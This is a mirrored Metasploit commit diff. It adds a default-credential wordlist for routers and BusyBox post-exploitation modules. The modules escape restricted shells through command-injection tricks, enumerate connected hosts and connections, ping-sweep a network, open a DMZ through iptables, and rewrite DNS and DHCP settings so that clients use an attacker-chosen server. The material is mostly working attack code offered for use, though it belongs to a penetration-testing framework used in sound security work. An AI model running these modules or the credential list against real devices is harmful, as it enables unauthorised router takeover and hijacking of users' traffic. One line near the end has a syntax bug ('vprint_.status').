mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Added modules to jailbreak and control remotely BusyBox based devices. It was added to a word list with default credentials typically used by commercial routers.
This commit is contained in:
parent
a611fff7bf
commit
5ff61ca5f3
398
data/wordlists/routers_userpass.txt
Normal file
398
data/wordlists/routers_userpass.txt
Normal file
@ -0,0 +1,398 @@
|
||||
debug synnet
|
||||
tech tech
|
||||
adminttd adminttd
|
||||
admin comcomcom
|
||||
admin admin
|
||||
admin synnet
|
||||
monitor monitor
|
||||
manager manager
|
||||
admin password
|
||||
User Password
|
||||
Administrator admin
|
||||
security security
|
||||
3comcso RIP000
|
||||
recovery recovery
|
||||
volition volition
|
||||
Administrator 3ware
|
||||
sysadm anicust
|
||||
Admin admin
|
||||
none 0
|
||||
admin secure
|
||||
kermit kermit
|
||||
dhs3mt dhs3mt
|
||||
at4400 at4400
|
||||
mtch mtch
|
||||
mtcl mtcl
|
||||
root letacla
|
||||
dhs3pms dhs3pms
|
||||
adfexc adfexc
|
||||
client client
|
||||
install llatsni
|
||||
halt tlah
|
||||
admin switch
|
||||
diag switch
|
||||
root permit
|
||||
ftp_inst pbxk1064
|
||||
ftp_admi kilo1987
|
||||
ftp_oper help1954
|
||||
ftp_nmc tuxalize
|
||||
manager friend
|
||||
manager admin
|
||||
Manager friend
|
||||
none admin
|
||||
admin linga
|
||||
root root
|
||||
user user
|
||||
admin cableroot
|
||||
acc acc
|
||||
device device
|
||||
apc apc
|
||||
root admin
|
||||
root alpine
|
||||
admin 0
|
||||
IntraSwitch Asante
|
||||
IntraStack Asante
|
||||
admin asante
|
||||
readonly lucenttech2
|
||||
root ascend
|
||||
admin epicrouter
|
||||
customer none
|
||||
DTA TJM
|
||||
admin atlantis
|
||||
root ROOT500
|
||||
diag danger
|
||||
manuf xxyyzz
|
||||
craft crftpw
|
||||
root cms500
|
||||
dadmin dadmin01
|
||||
root pass
|
||||
admin bintec
|
||||
admin articon
|
||||
patrol patrol
|
||||
webadmin webadmin
|
||||
installer installer
|
||||
root fivranne
|
||||
admin 1234
|
||||
mediator mediator
|
||||
root Mau'dib
|
||||
cellit cellit
|
||||
admin diamond
|
||||
cmaker cmaker
|
||||
admin changeme
|
||||
netrangr attack
|
||||
bbsd-client changeme2
|
||||
bbsd-client NULL
|
||||
Administrator changeme
|
||||
root attack
|
||||
admin default
|
||||
Cisco Cisco
|
||||
admin cisco
|
||||
root blender
|
||||
hsa hsadb
|
||||
wlse wlsedb
|
||||
root Cisco
|
||||
admin system
|
||||
user tivonpw
|
||||
cisco cisco
|
||||
administrator administrator
|
||||
user user
|
||||
operator operator
|
||||
user public
|
||||
PFCUser 240653C9467E45
|
||||
corecess corecess
|
||||
cgadmin cgadmin
|
||||
super surt
|
||||
root tslinux
|
||||
D-Link D-Link
|
||||
root tini
|
||||
anonymous any@
|
||||
root davox
|
||||
davox davox
|
||||
MDaemon MServer
|
||||
root calvin
|
||||
admin my_DEMARC
|
||||
PBX PBX
|
||||
NETWORK NETWORK
|
||||
admin michelangelo
|
||||
user password
|
||||
draytek 1234
|
||||
admin 123
|
||||
login admin
|
||||
login password
|
||||
admin netadmin
|
||||
tiger tiger123
|
||||
websecadm changeme
|
||||
netman netman
|
||||
1111 1111
|
||||
supervisor supervisor
|
||||
anonymous Exabyte
|
||||
root default
|
||||
admin radius
|
||||
admin isee
|
||||
MGR HPP187
|
||||
MGR HPP189
|
||||
MGR HPP196
|
||||
MGR INTX3
|
||||
MGR ITF3000
|
||||
MGR NETBASE
|
||||
MGR REGO
|
||||
MGR RJE
|
||||
MGR CONV
|
||||
OPERATOR SYS
|
||||
OPERATOR DISC
|
||||
OPERATOR SYSTEM
|
||||
OPERATOR SUPPORT
|
||||
OPERATOR COGNOS
|
||||
PCUSER SYS
|
||||
RSBCMON SYS
|
||||
SPOOLMAN HPOFFICE
|
||||
WP HPOFFICE
|
||||
ADVMAIL HPOFFICE DATA
|
||||
ADVMAIL HP
|
||||
FIELD SUPPORT
|
||||
FIELD MGR
|
||||
FIELD SERVICE
|
||||
FIELD MANAGER
|
||||
FIELD HPP187 SYS
|
||||
FIELD LOTUS
|
||||
FIELD HPWORD PUB
|
||||
FIELD HPONLY
|
||||
HELLO MANAGER.SYS
|
||||
HELLO MGR.SYS
|
||||
HELLO FIELD.SUPPORT
|
||||
HELLO OP.OPERATOR
|
||||
MAIL MAIL
|
||||
MAIL REMOTE
|
||||
MAIL TELESUP
|
||||
MAIL HPOFFICE
|
||||
MAIL MPE
|
||||
MANAGER TCH
|
||||
MANAGER SYS
|
||||
MANAGER SECURITY
|
||||
MANAGER ITF3000
|
||||
MANAGER HPOFFICE
|
||||
MANAGER COGNOS
|
||||
MANAGER TELESUP
|
||||
MGR SYS
|
||||
MGR CAROLIAN
|
||||
MGR VESOFT
|
||||
MGR XLSERVER
|
||||
MGR SECURITY
|
||||
MGR TELESUP
|
||||
MGR HPDESK
|
||||
MGR CCC
|
||||
MGR CNAS
|
||||
MGR WORD
|
||||
MGR COGNOS
|
||||
MGR ROBELLE
|
||||
MGR HPOFFICE
|
||||
MGR HPONLY
|
||||
admin hp.com
|
||||
storwatch specialist
|
||||
vt100 public
|
||||
superadmin secret
|
||||
hscroot abc123
|
||||
USERID PASSW0RD
|
||||
Administrator pilou
|
||||
Administrator letmein
|
||||
NICONEX NICONEX
|
||||
setup setup
|
||||
intel intel
|
||||
admin hello
|
||||
admin giraff
|
||||
SYSDBA masterkey
|
||||
intermec intermec
|
||||
operator $chwarzepumpe
|
||||
system sys
|
||||
admin operator
|
||||
admin ironport
|
||||
JDE JDE
|
||||
PRODDTA PRODDTA
|
||||
netscreen netscreen
|
||||
superuser 123456
|
||||
admin 123456
|
||||
sysadmin PASS
|
||||
login access
|
||||
comcast 1234
|
||||
setup changeme
|
||||
setup changeme!
|
||||
super super
|
||||
xxx cascade
|
||||
admin Ascend
|
||||
readwrite lucenttech1
|
||||
LUCENT01 UI-PSWD-01
|
||||
LUCENT02 UI-PSWD-02
|
||||
admin AitbISP4eCiG
|
||||
bciim bciimpw
|
||||
bcim bcimpw
|
||||
bcms bcmspw
|
||||
bcnas bcnaspw
|
||||
blue bluepw
|
||||
browse browsepw
|
||||
browse looker
|
||||
craft craft
|
||||
craft craftpw
|
||||
cust custpw
|
||||
enquiry enquirypw
|
||||
field support
|
||||
inads indspw
|
||||
inads inads
|
||||
init initpw
|
||||
locate locatepw
|
||||
maint maintpw
|
||||
maint rwmaint
|
||||
nms nmspw
|
||||
rcust rcustpw
|
||||
support supportpw
|
||||
tech field
|
||||
scmadmin scmchangeme
|
||||
Administrator password
|
||||
MICRO RSX
|
||||
service smile
|
||||
system password
|
||||
cablecom router
|
||||
admin motorola
|
||||
router router
|
||||
SYSADM sysadm
|
||||
admin admin123
|
||||
GlobalAdmin GlobalAdmin
|
||||
super 5777364
|
||||
superman 21241036
|
||||
naadmin naadmin
|
||||
netopia netopia
|
||||
admin noway
|
||||
admin NetCache
|
||||
e500 e500changeme
|
||||
e250 e250changeme
|
||||
guest guest
|
||||
admin asd
|
||||
vcr NetVCR
|
||||
m1122 m1122
|
||||
telecom telecom
|
||||
disttech 4tas
|
||||
maint maint
|
||||
mlusr mlusr
|
||||
admin root
|
||||
l2 l2
|
||||
l3 l3
|
||||
ro ro
|
||||
rw rw
|
||||
rwa rwa
|
||||
admin setup
|
||||
login 0
|
||||
login 1111
|
||||
login 8429
|
||||
spcl 0
|
||||
root 3ep5w2u
|
||||
maint ntacdmax
|
||||
ccrusr ccrusr
|
||||
supervisor PlsChgMe!
|
||||
266344 266344
|
||||
supervisor PlsChgMe1
|
||||
admin adslolitec
|
||||
admin OCS
|
||||
adminstat OCS
|
||||
adminview OCS
|
||||
adminuser OCS
|
||||
helpdesk OCS
|
||||
sys uplink
|
||||
cac_admin cacadmin
|
||||
system sys
|
||||
manager change_on_install
|
||||
admin kont2004
|
||||
Manager Manager
|
||||
sysadm sysadm
|
||||
write private
|
||||
debug d.e.b.u.g
|
||||
echo echo
|
||||
PSEAdmin $secure$
|
||||
admin superuser
|
||||
admin mu
|
||||
admin microbusiness
|
||||
admin smallbusiness
|
||||
Polycom SpIp
|
||||
support h179350
|
||||
lp lp
|
||||
radware radware
|
||||
wradmin trancell
|
||||
piranha q
|
||||
piranha piranha
|
||||
sysadmin password
|
||||
setup changeme
|
||||
teacher password
|
||||
temp1 password
|
||||
admin rmnetlm
|
||||
admin2 changeme
|
||||
adminstrator changeme
|
||||
deskalt password
|
||||
deskman changeme
|
||||
desknorm password
|
||||
deskres password
|
||||
replicator replicator
|
||||
RMUser1 password
|
||||
topicalt password
|
||||
topicnorm password
|
||||
topicres password
|
||||
root 1234
|
||||
public public
|
||||
admin w2402
|
||||
GEN1 gen1
|
||||
GEN2 gen2
|
||||
ADMN admn
|
||||
eng engineer
|
||||
op op
|
||||
op operator
|
||||
su super
|
||||
poll tech
|
||||
sysadmin sysadmin
|
||||
admin pwp
|
||||
superuser admin
|
||||
admin hagpolm1
|
||||
Administrator ganteng
|
||||
Administrator smcadmin
|
||||
admin barricade
|
||||
smc smcadmin
|
||||
admin smcadmin
|
||||
cusadmin highspeed
|
||||
1.79 + Multi
|
||||
aaa often blank
|
||||
admin Protector
|
||||
admin conexant
|
||||
admin xad$l#12
|
||||
root changeme
|
||||
Sweex Mysweex
|
||||
target password
|
||||
install secret
|
||||
super.super master
|
||||
xbox xbox
|
||||
telco telco
|
||||
tellabs tellabs#1
|
||||
root admin_1
|
||||
tiara tiaranet
|
||||
superman talent
|
||||
admin extendnet
|
||||
root 12345
|
||||
cablemodem robotics
|
||||
NAU NAU
|
||||
ADMINISTRATOR ADMINISTRATOR
|
||||
HTTP HTTP
|
||||
Any 12345
|
||||
support support
|
||||
VTech VTech
|
||||
admin visual
|
||||
root 123456
|
||||
CSG SESAME
|
||||
user pass
|
||||
admin sysAdmin
|
||||
root wyse
|
||||
VNC winterm
|
||||
rapport r@p8p0r+
|
||||
1502 1502
|
||||
xd xd
|
||||
admin 2222
|
||||
admin 22222
|
||||
admin 1111
|
||||
admin zoomadsl
|
||||
ZXDSL ZXDSL
|
||||
1234 1234
|
||||
webadmin 1234
|
68
modules/post/linux/gather/busybox_enum_connections.rb
Normal file
68
modules/post/linux/gather/busybox_enum_connections.rb
Normal file
@ -0,0 +1,68 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BusyBox Enumerate Connections',
|
||||
'Description' => 'This module will be applied on a session connected
|
||||
to a BusyBox sh shell. The script will enumerate
|
||||
the connections established by the hosts connected
|
||||
to the router or device executing BusyBox.',
|
||||
'Author' => 'Javier Vicente Vallejo',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://vallejo.cc']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell']
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
|
||||
def run
|
||||
found = false
|
||||
conns_files =[
|
||||
"/proc/net/nf_conntrack", "/proc/net/ip_conntrack", "/proc/net/tcp", "/proc/net/udp", "/proc/net/arp", "/proc/fcache/*"
|
||||
]
|
||||
vprint_status("Searching for files that store information about network connections.")
|
||||
conns_files.each do |conns_file|
|
||||
if file_exists(conns_file)
|
||||
found = true
|
||||
print_good("Connections File found: #{conns_file}.")
|
||||
begin
|
||||
str_file=read_file(conns_file)
|
||||
vprint_line(str_file)
|
||||
#Store file
|
||||
p = store_loot("Connections", "text/plain", session, str_file, conns_file, "BusyBox Device Network Established Connections")
|
||||
print_good("Connections saved to #{p}.")
|
||||
rescue EOFError
|
||||
# If there's nothing in the file, we hit EOFError
|
||||
print_error("Nothing read from file #{conns_file}, file may be empty.")
|
||||
end
|
||||
end
|
||||
end
|
||||
if found == false
|
||||
print_error("Nothing read from connection files, files may be empty.")
|
||||
end
|
||||
end
|
||||
|
||||
#file? doesnt work because test -f is not implemented in busybox
|
||||
def file_exists(file_path)
|
||||
s = read_file(file_path)
|
||||
if s and s.length
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
63
modules/post/linux/gather/busybox_enum_hosts.rb
Normal file
63
modules/post/linux/gather/busybox_enum_hosts.rb
Normal file
@ -0,0 +1,63 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BusyBox Enumerate Hosts',
|
||||
'Description' => 'This module will be applied on a session connected
|
||||
to a BusyBox sh shell. The script will enumerate
|
||||
the hosts connected to the router or device executing
|
||||
BusyBox.',
|
||||
'Author' => 'Javier Vicente Vallejo',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://vallejo.cc']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell']
|
||||
)
|
||||
end
|
||||
|
||||
def run
|
||||
hosts_file = nil
|
||||
if file_exists("/var/hosts")
|
||||
hosts_file = "/var/hosts"
|
||||
elsif file_exists("/var/udhcpd/udhcpd.leases")
|
||||
hosts_file = "/var/udhcpd/udhcpd.leases"
|
||||
else
|
||||
vprint_error("Files not found: /var/hosts, /var/udhcpd/udhcpd.leases.")
|
||||
return
|
||||
end
|
||||
#File exists
|
||||
begin
|
||||
str_file=read_file(hosts_file)
|
||||
print_good("Hosts File found: #{hosts_file}.")
|
||||
vprint_line(str_file)
|
||||
#Store file
|
||||
p = store_loot("Hosts", "text/plain", session, str_file, hosts_file, "BusyBox Device Connected Hosts")
|
||||
print_good("Hosts saved to #{p}.")
|
||||
rescue EOFError
|
||||
# If there's nothing in the file, we hit EOFError
|
||||
print_error("Nothing read from file: #{hosts_file}, file may be empty.")
|
||||
end
|
||||
end
|
||||
|
||||
#file? doesnt work because test -f is not implemented in busybox
|
||||
def file_exists(file_path)
|
||||
s = read_file(file_path)
|
||||
if s and s.length
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
165
modules/post/linux/gather/busybox_pingnet.rb
Normal file
165
modules/post/linux/gather/busybox_pingnet.rb
Normal file
@ -0,0 +1,165 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BusyBox Ping Network',
|
||||
'Description' => 'This module will be applied on a session connected
|
||||
to a BusyBox sh shell. The script will ping a range of
|
||||
ip adresses from the router or device executing BusyBox.',
|
||||
'Author' => 'Javier Vicente Vallejo',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://vallejo.cc']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell']
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptAddress.new('IPRANGESTART', [ true, "The first ip address of the range to ping.", nil ]),
|
||||
OptAddress.new('IPRANGEEND', [ true, "The last ip address of the range to ping.", nil ])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
#this module will send a sh script for busybox shell for doing ping to a range of ip address from
|
||||
#the router or device that is executing busybox. It could be possible to calculate each ip address
|
||||
#of the range of ip addresses in the ruby script and execute each ping command with cmd_exec, but
|
||||
#it would generate an unnecesary traffic in the connection with the busybox device (usually telnet)
|
||||
|
||||
sh_script_lines=[
|
||||
"#!/bin/sh",
|
||||
"param1=#{datastore['IPRANGESTART']}",
|
||||
"param2=#{datastore['IPRANGEEND']}",
|
||||
"while true;",
|
||||
" param1cpy=\"$param1\"",
|
||||
" pos=`expr index \"$param1cpy\" \".\"`",
|
||||
" pos=`expr $pos - 1`",
|
||||
" octec1=`expr substr \"$param1cpy\" 1 $pos`",
|
||||
" pos=`expr $pos + 2`",
|
||||
" len=`expr length \"$param1cpy\"`",
|
||||
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
|
||||
" pos=`expr index \"$param1cpy\" \".\"`",
|
||||
" pos=`expr $pos - 1`",
|
||||
" octec2=`expr substr \"$param1cpy\" 1 $pos`",
|
||||
" pos=`expr $pos + 2`",
|
||||
" len=`expr length \"$param1cpy\"`",
|
||||
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
|
||||
" pos=`expr index \"$param1cpy\" \".\"`",
|
||||
" pos=`expr $pos - 1`",
|
||||
" octec3=`expr substr \"$param1cpy\" 1 $pos`",
|
||||
" pos=`expr $pos + 2`",
|
||||
" len=`expr length \"$param1cpy\"`",
|
||||
" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
|
||||
" octec4=\"$param1cpy\"",
|
||||
" carry=0",
|
||||
" len=`expr length \"$octec4\"`",
|
||||
" temp=`expr match \"$octec4\" \"255\"`",
|
||||
" if [ $temp -eq $len ]; then",
|
||||
" octec4=0",
|
||||
" carry=1",
|
||||
" else",
|
||||
" octec4=`expr $octec4 + 1`",
|
||||
" fi",
|
||||
" if [ $carry -eq 1 ]; then",
|
||||
" carry=0",
|
||||
" len=`expr length \"$octec3\"`",
|
||||
" temp=`expr match \"$octec3\" \"255\"`",
|
||||
" if [ $temp -eq $len ]; then",
|
||||
" octec3=0",
|
||||
" carry=1",
|
||||
" else",
|
||||
" octec3=`expr \"$octec3\" + 1`",
|
||||
" fi",
|
||||
" fi",
|
||||
" if [ $carry -eq 1 ]; then",
|
||||
" carry=0",
|
||||
" len=`expr length \"$octec2\"`",
|
||||
" temp=`expr match \"$octec2\" \"255\"`",
|
||||
" if [ $temp -eq $len ]; then",
|
||||
" octec2=0",
|
||||
" carry=1",
|
||||
" else",
|
||||
" octec2=`expr $octec2 + 1`",
|
||||
" fi",
|
||||
" fi",
|
||||
" if [ $carry -eq 1 ]; then",
|
||||
" carry=0",
|
||||
" len=`expr length \"$octec1\"`",
|
||||
" temp=`expr match \"$octec1\" \"255\"`",
|
||||
" if [ $temp -eq $len ]; then",
|
||||
" octec1=0",
|
||||
" carry=1",
|
||||
" else",
|
||||
" octec1=`expr $octec1 + 1`",
|
||||
" fi",
|
||||
" fi",
|
||||
" ping -c 1 \"$param1\"",
|
||||
" param1=\"$octec1\"\".\"\"$octec2\"\".\"\"$octec3\"\".\"\"$octec4\"",
|
||||
" temp=`expr match \"$param1\" \"$param2\"`",
|
||||
" len=`expr length \"$param2\"`",
|
||||
" if [ $temp -eq $len ]; then",
|
||||
" ping -c 1 \"$param1\"",
|
||||
" break",
|
||||
" fi",
|
||||
"done"
|
||||
]
|
||||
|
||||
begin
|
||||
#send script and receive echos
|
||||
count=0
|
||||
sh_script_lines.each do |sh_script_line|
|
||||
session.shell_write(sh_script_line + "\n")
|
||||
count+=1
|
||||
result=session.shell_read() #receive echos
|
||||
vprint_status(result)
|
||||
Rex::sleep(0.03)
|
||||
end
|
||||
rescue
|
||||
print_error("Problems were found while sending script to the BusyBox device.")
|
||||
return
|
||||
end
|
||||
Rex::sleep(1.00)
|
||||
|
||||
full_results = ""
|
||||
begin
|
||||
#receiving ping results
|
||||
count=0
|
||||
print_status("Script has been sent to the busybox device. Doing ping to the range of addresses.")
|
||||
while count<15 #we stop when we have been 15 seconds without receiving responses
|
||||
result = session.shell_read()
|
||||
if result.length>0
|
||||
count=0
|
||||
print_status(result)
|
||||
full_results << result
|
||||
else
|
||||
vprint_status("No response.")
|
||||
count+=1
|
||||
end
|
||||
Rex::sleep(1.00)
|
||||
end
|
||||
rescue
|
||||
print_warning("Problems were found while receiving ping results. Probably remote device terminated the connection.\nResults that were already received will be kept.")
|
||||
end
|
||||
|
||||
#storing results
|
||||
|
||||
p = store_loot("Pingnet", "text/plain", session, full_results, "#{datastore['IPRANGESTART']}"+"-"+"#{datastore['IPRANGEEND']}", "BusyBox Device Network Range Pings")
|
||||
print_good("Pingnet results saved to #{p}.")
|
||||
|
||||
end
|
||||
|
||||
end
|
64
modules/post/linux/manage/busybox_jailbreak.rb
Normal file
64
modules/post/linux/manage/busybox_jailbreak.rb
Normal file
@ -0,0 +1,64 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BusyBox Jailbreak ',
|
||||
'Description' => 'This module will send a set of commands to a open
|
||||
session that is connected to a BusyBox limited shell
|
||||
(i.e. a router limited shell). It will try different
|
||||
known tricks to try to jailbreak the limited shell and
|
||||
get a full sh busybox shell.',
|
||||
'Author' => 'Javier Vicente Vallejo',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://vallejo.cc']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell']
|
||||
)
|
||||
end
|
||||
|
||||
def run
|
||||
bfound = false
|
||||
bfound = try_command("cat xx || sh\n","1_1") unless bfound
|
||||
bfound = try_command("ping || sh\n","1_2") unless bfound
|
||||
bfound = try_command("echo `sh >> /dev/ttyp0`\n","2_1") unless bfound
|
||||
bfound = try_command("ping `sh >> /dev/ttyp0`\n","2_2") unless bfound
|
||||
bfound = try_command("cat `sh >> /dev/ttyp0`\n","2_3") unless bfound
|
||||
bfound = try_command("cat xx;sh\n","3_1") unless bfound
|
||||
bfound = try_command("echo xx;sh\n","3_2") unless bfound
|
||||
bfound = try_command("ping;sh\n","3_3") unless bfound
|
||||
bfound = try_command("cat xx | sh\n","4_1") unless bfound
|
||||
bfound = try_command("ping | sh\n","4_2") unless bfound
|
||||
bfound = try_command("cat ($sh)\n","5_1") unless bfound
|
||||
bfound = try_command("echo ($sh) xx\n","5_2") unless bfound
|
||||
bfound = try_command("ping ($sh)\n","5_3") unless bfound
|
||||
bfound = try_command("cat xx && sh\n","6_1") unless bfound
|
||||
bfound = try_command("echo xx && sh\n","6_2") unless bfound
|
||||
bfound = try_command("ping && sh\n","3_3") unless bfound
|
||||
print_error("Unable to jailbreak device shell.") if !bfound
|
||||
end
|
||||
|
||||
def try_command(param_command, method_number)
|
||||
vprint_status("jailbreak sent: #{param_command}.")
|
||||
session.shell_write(param_command)
|
||||
(1..10).each do
|
||||
resp = session.shell_read()
|
||||
vprint_status("jailbreak received: #{resp}.")
|
||||
if ((resp.include? "BusyBox") && (resp.include? "Built-in shell"))
|
||||
vprint_status("Done method " + method_number + ".")
|
||||
return true
|
||||
end
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
49
modules/post/linux/manage/busybox_setdmz.rb
Normal file
49
modules/post/linux/manage/busybox_setdmz.rb
Normal file
@ -0,0 +1,49 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BusyBox Set Dmz',
|
||||
'Description' => 'This module will be applied on a session connected
|
||||
to a BusyBox sh shell. The script will enable or disable dmz
|
||||
to a network host in the router or device executing BusyBox.',
|
||||
'Author' => 'Javier Vicente Vallejo',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://vallejo.cc']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell']
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptAddress.new('TARGETHOST', [ true, "The address of the host to be target for the dmz", nil ]),
|
||||
OptBool.new('DELETE', [false, "If this option is set to true, the DMZ is removed. Else it is added.", false])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
if datastore['DELETE'] == true
|
||||
vprint_status("Executing iptables to delete dmz.")
|
||||
vprint_status(cmd_exec("iptables -D FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT"))
|
||||
else
|
||||
vprint_status("Executing iptables to add dmz.")
|
||||
vprint_status(cmd_exec("iptables -A FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT"))
|
||||
end
|
||||
if datastore['VERBOSE']
|
||||
vprint_status(cmd_exec("iptables --list"))
|
||||
end
|
||||
print_good("Dmz modified. Enable verbose for additional information.")
|
||||
|
||||
end
|
||||
|
||||
end
|
124
modules/post/linux/manage/busybox_setdns.rb
Normal file
124
modules/post/linux/manage/busybox_setdns.rb
Normal file
@ -0,0 +1,124 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BusyBox Set Dns',
|
||||
'Description' => 'This module will be applied on a session connected
|
||||
to a BusyBox sh shell. The script will set dns addresses
|
||||
to the router or device executing BusyBox to be sent
|
||||
by dhcp server to network hosts.',
|
||||
'Author' => 'Javier Vicente Vallejo',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://vallejo.cc']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell']
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptAddress.new('SRVHOST', [ true, "The dns server address.", nil ])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
#The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
|
||||
#udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
|
||||
|
||||
def run
|
||||
|
||||
workdone = false
|
||||
vprint_status("Searching for files to modify dns server.")
|
||||
if file_exists("/etc/resolv.conf")
|
||||
vprint_status("Resolv.conf found.")
|
||||
if is_writable_and_write("/etc/resolv.conf", "nameserver #{datastore['SRVHOST']}", false)
|
||||
print_good("Dns server added to resolv.conf.")
|
||||
workdone = true
|
||||
end
|
||||
end
|
||||
if file_exists("/etc/udhcpd.conf")
|
||||
vprint_status("Udhcpd.conf found.")
|
||||
original_content = read_file("/etc/udhcpd.conf")
|
||||
vprint_status("Original udhcpd.conf content:")
|
||||
vprint_status(original_content)
|
||||
if is_writable_and_write("/etc/udhcpd.conf", "option dns #{datastore['SRVHOST']}", false)
|
||||
vprint_status("Udhcpd.conf is writable.")
|
||||
is_writable_and_write("/etc/udhcpd.conf", original_content, true)
|
||||
vprint_status("Relaunching udhcp server:")
|
||||
cmd_exec("killall dhcpd\n")
|
||||
cmd_exec("dhcpd /etc/udhcpd.conf &\n")
|
||||
print_good("Udhcpd.conf modified and dns server added. Dhcpd restarted.")
|
||||
else
|
||||
vprint_status("Unable to write udhcpd.conf. Trying to copy the file to a writable directory.")
|
||||
writable_directory = nil
|
||||
vprint_.status("Trying to find writable directory.")
|
||||
writable_directory = "/etc/" if is_writable_and_write("/etc/tmp.conf", "x", false)
|
||||
writable_directory = "/mnt/" if (!writable_directory && is_writable_and_write("/mnt/tmp.conf", "x", false))
|
||||
writable_directory = "/var/" if (!writable_directory && is_writable_and_write("/var/tmp.conf", "x", false))
|
||||
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_and_write("/var/tmp/tmp.conf", "x", false))
|
||||
if writable_directory
|
||||
vprint_status("writable directory found, creating a copy of the original udhcpd.conf.")
|
||||
is_writable_and_write("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", false)
|
||||
is_writable_and_write("#{writable_directory}tmp.conf", original_content, true)
|
||||
vprint_status("Relaunching udhcp server:")
|
||||
cmd_exec("killall dhcpd\n")
|
||||
cmd_exec("dhcpd #{writable_directory}tmp.conf &\n")
|
||||
print_good("Udhcpd.conf copied to writable directory and dns server added. Dhcpd restarted.")
|
||||
workdone = true
|
||||
else
|
||||
vprint_error("Writable directory not found.")
|
||||
end
|
||||
end
|
||||
end
|
||||
if !workdone
|
||||
print_error("Unable to modify dns server.")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#This function checks if the target file is writable and writes or append the data given as parameter.
|
||||
#BusyBox shell's commands are limited and Msf > Post > File > write_file function doesnt work here, for
|
||||
#this reason it is necessary to implement an specific function
|
||||
|
||||
def is_writable_and_write(file_path, data, append)
|
||||
if append
|
||||
data = read_file(file_path) + "\n" + data
|
||||
end
|
||||
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
|
||||
session.shell_write("echo #{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
|
||||
session.shell_read(); Rex::sleep(0.1)
|
||||
if read_file(file_path).include? rand_str
|
||||
session.shell_write("echo \"\"> #{file_path}\n"); Rex::sleep(0.1)
|
||||
session.shell_read(); Rex::sleep(0.1)
|
||||
lines = data.lines.map(&:chomp)
|
||||
lines.each do |line|
|
||||
session.shell_write("echo #{line.chomp} >> #{file_path}\n"); Rex::sleep(0.1)
|
||||
session.shell_read(); Rex::sleep(0.1)
|
||||
end
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
